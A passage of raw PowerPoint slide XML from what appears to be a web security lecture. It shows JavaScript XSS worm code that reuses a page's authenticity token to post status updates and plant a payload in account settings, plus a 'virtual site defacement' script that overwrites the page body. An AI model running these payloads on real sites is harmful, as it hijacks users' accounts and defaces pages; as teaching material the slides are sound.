              </a:rPr>
              <a:t>XHConn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ajaxConn.connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>("/status/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>update","POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>", </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authenticity_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+"&amp;status=" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>updateEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> + "&amp;tab=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>home&amp;update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>=update");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> ajaxConn1 = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>XHConn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Courier"/>
              <a:cs typeface="Courier"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>ajaxConn1.connect("/account/settings", "POST", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authenticity_token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>="+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>authtoken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+"&amp;user[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>]="+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>+"&amp;tab=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>home&amp;update</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>=update");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="356992464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XSS Attack: Virtual Site Defacement</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>badteam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = "Patriots ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>awesometeam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = "Any other team ";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> data = "";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> = 0; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> &lt; 100; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>++) { </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  data += "&lt;marquee&gt;&lt;b&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>  for (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> y = 0; y &lt; 8; y++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>Math.random</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>() &gt; .6) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      data += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>badteam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t> ;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>data += " kicks worse than my mom!&amp;nbsp;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    } else {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      data += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>awesometeam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>      data += " is obviously totally awesome!&amp;nbsp;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>data += "&lt;/h1&gt;&lt;/marquee&gt;";}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>document.body.innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>=(data + "");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:cs typeface="Courier"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1643368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22B77F-B433-FC4E-8228-7EB9F5A3ABCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1649049" y="0"/>
            <a:ext cx="12442098" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3978587764"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:fade/>
